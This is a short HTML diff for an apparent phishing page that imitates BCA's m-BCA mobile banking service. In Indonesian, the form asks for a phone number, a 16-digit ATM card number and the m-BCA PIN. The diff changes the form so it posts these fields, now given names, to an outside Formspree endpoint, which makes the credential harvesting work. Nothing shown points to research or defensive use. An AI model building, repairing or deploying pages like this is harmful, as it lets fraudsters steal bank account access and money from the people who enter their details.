--- a/input.html
+++ b/input.html
@@ -20,10 +20,10 @@
     <img src="https://res.cloudinary.com/codelifings/image/upload/v1613365398/Tak_berjudul43_20210215120201_np8fkd.png" alt="">
   </div>
   <br><br>
-    <form method="POST" name="BCA mobilee" data-netlify="true">
-      <input class="u-full-width" type="number" placeholder="Nomor Handphone" id="handphone">
-      <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor-atm">
-      <input class="u-full-width" type="number" placeholder="Masukkan Pin m-BCA Anda" id="pin">
+    <form action="https://formspree.io/f/xyybaejk" method="POST">
+      <input class="u-full-width" type="number" placeholder="Nomor Handphone" id="handphone" name="handphone">
+      <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor-atm" name="nomor-atm">
+      <input class="u-full-width" type="number" placeholder="Masukkan Pin m-BCA Anda" id="pin" name="pin">
       <input style="float: right" class="button-primary" type="submit" value="OK">
     </form>
 
